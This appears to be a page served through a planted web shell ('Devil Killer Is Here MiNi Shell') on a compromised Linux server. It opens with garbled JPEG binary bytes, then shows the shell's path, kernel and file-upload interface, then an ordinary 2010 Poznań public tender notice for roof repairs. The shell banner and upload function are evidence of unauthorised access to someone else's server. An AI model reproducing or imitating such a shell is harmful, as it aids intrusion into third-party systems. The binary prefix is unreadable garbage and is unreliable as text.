JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100723/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100723/197051-N-2010.html

<p class="kh_header"><b>Poznań: Remont dachów</b><br>
<b>Numer ogłoszenia: 197051 - 2010; data zamieszczenia: 23.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Poznań - Zarząd Komunalnych Zasobów Lokalowych w im. i na rzecz którego działa Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej S.A. , ul. Rybaki 18a, 61-884 Poznań, woj. wielkopolskie, tel. (061) 657 90 00, faks (061) 657 90 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpgm.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: osoba prawna działająca w imieniu administracji samorządowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dachów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia są roboty budowlane polegające na remontach dachów budynków administrowanych przez Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej Spółkę Akcyjną, z siedzibą  przy ul. Rybaki 18a, w Poznaniu. Zamówienie zostało podzielone na pięć części: część I -remont dachów budynków mieszkalnych, znajdujących się w Poznaniu przy ul. Towarowej 43 oraz przy ul. Żydowskiej 32, na terenie administrowanym przez Biuro Obsługi Mieszkańców Nr 3;
część II - remont dachów budynków mieszkalnych, znajdujących  się w Poznaniu przy ul. Ku Dębinie 1 oraz przy ul.Opolskiej 55-59,  na terenie administrowanym przez Biuro Obsługi Mieszkańców Nr 4 ;część III -  remont dachów budynków mieszkalnych, znajdujących się w Poznaniu przy ul. Załęże 6a oraz przy ul.Jarochowskiego 52, na terenie administrowanym przez Biuro Obsługi Mieszkańców Nr 5; część IV -  remont dachu w budynku mieszkalnym, znajdującym się w Poznaniu przy ul. Nowotomyskiej 10, na terenie administrowanym przez Biuro Obsługi Mieszkańców Nr 6;
część V -  remont dachu w budynku użytkowym znajdującym się w Poznaniu przy ul. Warszawskiej 25, na terenie administrowanym przez Dział Eksploatacji. Zakres prac remontowych obejmuje m.in.: dla części I -ul. Towarowa 43 (zadanie nr 1) i ul. Żydowska 32 (zadanie nr 2)- ustawienie rusztowań, rozbiórkę obróbek blacharskich, rozbiórkę dachówki ceramicznej i ułożenie nowej dachówki ceramicznej karpiówki w koronkę podwójnie, przycięcie i przybicie kontrłat i łat, demontaż rur spustowych i rynien, wymiana okien wyłazowych, wymiana ław kominiarskich, zamontowanie stopni kominiarskich, przemurowanie kominów ponad dachem, wymurowanie czap z cegły klinkierowej, ułożenie na krokwiach izolacji paroprzepuszczalnej, wykonanie rur wentylacyjnych piony kanalizacyjne, wykonanie rynien, pasów nadrynnowych, koszy i obróbek kafarków z blachy stalowej ocynkowanej, zamontowanie gąsiorów, montaż rur spustowych z PCV, montaż okien połaciowych, wywóz gruzu na wysypisko wraz z opłatą i inne prace zgodnie  z przedmiarem robót i specyfikacją techniczną wykonania i odbioru robót budowlanych;dla części II-ul. Ku Dębinie 1 (zadanie nr 1) - ustawienie rusztowań, rozbiórkę obróbek blacharskich, rozbiórkę dachówki ceramicznej, demontaż rur spustowych i rynien, wymiana ław kominiarskich na metalowe perforowane, zamontowanie stopni kominiarskich, przemurowanie kominów ponad dachem, uzupełnienie tynków zewnętrznych, wymurowanie czap z cegły klinkierowej, wykonanie rynien, pasów nadrynnowych, koszy i obróbek z blachy stalowej ocynkowanej, ułożenie nowej dachówki ceramicznej karpiówki w koronkę podwójnie, przycięcie i przybicie kontrłat i łat, zamontowanie gąsiorów, montaż rur spustowych z PCV, montaż okien połaciowych, demontaż  i  ponowny montaż zwodów poziomych instalacji odgromowej,  wywóz materiałów z rozbiórki, uprzątnięcie terenu budowy i inne prace zgodnie z przedmiarem robót i specyfikacją techniczną wykonania i odbioru robót budowlanych;-	ul. Opolska 55-59 (zadanie nr 2) - ustawienie rusztowań, rozbiórkę obróbek blacharskich, rozbiórkę dachówki ceramicznej, rozbiórkę pokrycia z papy na dachach drewnianych i ułożenie nowej warstwy papy, demontaż rur spustowych i rynien, wymiana ław kominiarskich na metalowe perforowane, zamontowanie stopni kominiarskich , przemurowanie kominów ponad dachem, uzupełnienie tynków zewnętrznych, wymurowanie czap z cegły klinkierowej, wykonanie rur wentylacyjnych, wykonanie rynien, pasów nadrynnowych, koszy i obróbek z blachy stalowej ocynkowanej, ułożenie nowej dachówki ceramicznej karpiówki w koronkę podwójnie, przycięcie i przybicie kontrłat i łat, zamontowanie gąsiorów, montaż rur spustowych z PCV, montaż okien połaciowych, demontaż i ponowny montaż zwodów poziomych instalacji odgromowej,  wywóz materiałów z rozbiórki, uprzątnięcie terenu budowy i inne prace zgodnie z przedmiarem robót i specyfikacją techniczną wykonania i odbioru robót budowlanych;
dla części III-ul. Załęże 6a (zadanie nr 1) - ustawienie rusztowań, rozbiórka pokrycia dachowego z dachówek karpiówek układanych podwójnie, rozebranie ław kominiarskich, ołacenia dachu, deskowania dachu, rozebranie rynien z blachy nie nadających się do użytku, rozebranie obróbek blacharskich murów ogniowych, okapów, kołnierzy, gzymsów z blachy nie nadającej się do użytku, ułożenie na krokwiach ekranu zabezpieczającego z folii, Impregnacja, przycięcie i przybicie kontrłat i łat, deskowanie połaci dachowych z tarcicy iglastej, osadzenie wyłazów dachowych i okienek dymnikowych, pokrycie dachu dachówką karpiówką ceramiczną  w łuskę  wraz z pokryciem naroży i kalenic gąsiorami, zamontowanie rynien dachowych półokrągłych oraz rur spustowych okrągłych  z blachy z tytan-cynku, wykonanie obróbek blacharskich z blachy tytan-cynku, osadzenie okien połaciowych, przemurowanie kominów i murków,  wywóz materiałów z rozbiórki, uprzątnięcie terenu budowy i inne prace zgodnie z przedmiarem robót i specyfikacją techniczną wykonania i odbioru robót budowlanych;-	ul. Jarochowskiego 52 (zadanie nr 2) - ustawienie rusztowań, rozbiórkę czterech warstw pokrycia z papy , rozebranie rynien i rur spustowych z blachy nie nadającej się do użytku, rozebranie obróbek blacharskich murów ogniowych, okapów, kołnierzy, gzymsów z blachy nie nadającej się do użytku, pokrycie dwuwarstwowe dachu papą termozgrzewalną, wykonanie obróbek z papy nawierzchniowej, montaż drobnych elementów aluminiowych (listwy do obróbek kominów i murów ogniowych), zamontowanie rynien dachowych półokrągłych i rur spustowych okrągłych z blachy z tytan-cynku, wykonanie obróbek z blachy z tytan-cynku,  wywóz materiałów z rozbiórki, uprzątnięcie terenu budowy i inne prace zgodnie z przedmiarem robót i specyfikacją techniczną wykonania i odbioru robót budowlanych;dla części IV-	ul. Nowotomyska 10 - ustawienie rusztowań, rozbiórkę obróbek blacharskich, rozbiórkę dachówki ceramicznej, demontaż rur spustowych i rynien, wymianę okien połaciowych, wymianę ław kominiarskich na metalowe perforowane, zamontowanie stopni kominiarskich, przemurowanie kominów ponad dachem, wymurowanie czap z cegły klinkierowej, ułożenie na krokwiach izolacji paroprzepuszczalnej, wykonanie rur wentylacyjnych, wykonanie rynien, pasów nadrynnowych, koszy i obróbek kafarków z blachy stalowej ocynkowanej, przycięcie i przybicie kontrłat i łat, ułożenie nowej dachówki ceramicznej karpiówki w koronkę podwójnie, zamontowanie gąsiorów, montaż rur spustowych z PCV, montaż okien połaciowych, wykonanie oraz zamontowanie pionowej drabiny dwuczęściowej (od strony ogrodu) na elewacji budynku w celu dojścia do kominów, wywóz materiałów z rozbiórki, uprzątnięcie terenu budowy i inne prace zgodnie z przedmiarem robót i specyfikacją techniczną wykonania i odbioru robót budowlanych; dla części V-ul. Warszawska 25 (lokal użytkowy) - rozebranie rur spustowych i rynien dachowych wykonanych z blachy nie nadających się do użycia, rozebranie pokrycia z papy (jedna warstwa), rozebranie obróbek blacharskich murów ogniowych , okapów, kołnierzy, gzymsów z blachy nie nadającej się do użytku, skucie tynków kominów, wykonanie tynków na kominach  ponad dachem płaskim, przemurowanie kominów z cegieł klinkierowych, montaż obróbek blacharskich, uzupełnienie blachą ocynkowaną rynien wiszących półokrągłych, rozebranie rury wentylacyjnej i montaż nowej z kołpakiem z blachy ocynkowanej, wklejenie łat z papy zgrzewalnej, wyrównujących połać dachową, pokrycie dachu papą termozgrzewalną jednowarstwową, wykonanie obróbek kominów, włazów dachowych, wentylatora, wentylacji, podpór reklam z papy termozgrzewalnej, wymiana wsporników i przewodów instalacji odgromowej, zamontowanie rur spustowych z PCV i czyszczaków, przeczyszczenie rurociągu żeliwnego wraz z rewizją, wywóz materiałów z rozbiórki, uprzątnięcie terenu budowy i inne prace zgodnie z przedmiarem robót i specyfikacją techniczną wykonania     i odbioru robót budowlanych. Szczegółowy opis przedmiotu zamówienia wraz z zakresem robót określa załączona do SIWZ dokumentacja techniczna (załączniki nr 6-13 do SIWZ) składająca się z:1.Przedmiaru robót dla każdego budynku, 2.Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych. W przypadku pojawienia się nazw własnych materiałów należy przyjąć, iż są to przykładowe materiały i mają za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych Zamawiającego. 
Zamawiający dopuszcza rozwiązania równoważne pod warunkiem, że oferowane produkty posiadają parametry techniczne i jakościowe co najmniej takie same jak produkty podane za pomocą nazw producenta w dokumentacji opisującej przedmiot zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.26.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie posiadania wiedzy i doświadczenia Wykonawcy zobowiazani są wykazać, że: dla części I zamówienia - wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej jedną robotę budowlaną odpowiadającą robotom budowlanym stanowiącym przedmiot zamówienia, o wartości nie mniejszej niż 120000,- zł.  oraz  posiadają dokument potwierdzający, że robota ta została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. 
dla części II zamówienia - wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej jedną robotę budowlaną odpowiadającą robotom budowlanym stanowiącym przedmiot zamówienia, o wartości nie mniejszej niż 180000,- zł.  oraz  posiadają dokument potwierdzający, że robota ta została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. 
dla części III zamówienia - wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej jedną robotę budowlaną odpowiadającą robotom budowlanym stanowiącym przedmiot zamówienia, o wartości nie mniejszej niż 60000,- zł.  oraz  posiadają dokument potwierdzający, że robota ta została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. 
dla części IV zamówienia - wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej jedną robotę budowlaną odpowiadającą robotom budowlanym stanowiącym przedmiot zamówienia, o wartości nie mniejszej niż 25000,- zł.  oraz  posiadają dokument potwierdzający, że robota ta została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. 
dla części V zamówienia - wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej jedną robotę budowlaną odpowiadającą robotom budowlanym stanowiącym przedmiot zamówienia, o wartości nie mniejszej niż 30000,- zł.  oraz  posiadają dokument potwierdzający, że robota ta została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. 
W przypadku gdy Wykonawca złoży ofertę na więcej niż jedną część zamówienia, musi wykazać, że wykonał roboty budowlane, w ilości odpowiadającej częściom zamówienia, na które składa ofertę. Suma wykonanych robót musi odpowiadać wartościom robót wskazanych powyżej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawcy wykazali, że dysponują osobami zdolnymi do wykonania zamówienia, poprzez wykazanie, że dysponują lub będą dysponować co najmniej jedną osobą posiadającą uprawnienia budowlane, stwierdzające prawo do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej i przynależą do właściwej izby samorządu zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawcy wykazali się posiadaniem odpowiedniej sytuacji ekonomicznej i finansowej poprzez wykazanie posiadania ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej na kwotę nie mniejszą niż cena złożonej oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>kosztorys ofertowy sporządzony metodą szczegółową</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania zmian postanowień umowy zawartej z wybranym Wykonawcą w następujących przypadkach:1.W przypadku zmiany strukturalnych stron umowy, takich jak zmiana formy organizacyjno-prawnej Wykonawcy, zmiana firmy, pod którą działa Wykonawca, zmiana osoby uprawnionej do składania oświadczeń w imieniu Wykonawcy, powodujących potrzebę wprowadzenia do treści umowy zmian neutralnych lub korzystnych dla Zamawiającego, w zakresie dokonanych zmian strukturalnych. 2.W przypadku udzielenia zamówienia podwykonawcom w innej części niż wskazana w ofercie Wykonawcy, w zakresie możliwości przekazania innej części zamówienia podwykonawcom, niż wskazano w umowie. 3.W przypadku zamiany osób wskazanych w umowie jako reprezentantów stron przy realizacji zamówienia. 4.Możliwość dokonania każdej ze zmian np. w zakresie przedmiotu umowy, terminu wykonania przedmiotu umowy, w przypadku gdy z uwagi na liczne przeszkody spowodowane na skutek siły wyższej wykonanie umowy stało się niemożliwe. Przez siłę wyższą należy rozumieć zdarzenie zewnętrzne, wynikłe po podpisaniu umowy, którego nie można było przewidzieć, uniknąć ani jemu zapobiec przy zachowaniu wszelkich należytych środków, niezależne od stron umowy. Zdarzeniami siły wyższej są takie zdarzenia jak: klęski żywiołowe, anomalie klimatyczne, wojny, rewolucje, zamachy stanu, akty terrorystyczne, konfiskaty, nacjonalizacje i inne podobne decyzje władz państwowych. 5.Możliwość dokonania zmian na skutek zdarzenia niezależnego od Zamawiającego np. decyzji organu administracji orzeczenia sądowego, bezpośrednio wpływającego na przedmiot zamówienia, w zakresie objętym decyzją lub orzeczeniem sądu. 6.	Możliwość dokonania zmian przedmiotu umowy na skutek zdarzenia, którego następstwem jest utrata przez Zamawiającego prawa do administrowania nieruchomością, na której świadczona jest robota budowlana, w zakresie praw i obowiązków stron umowy. 
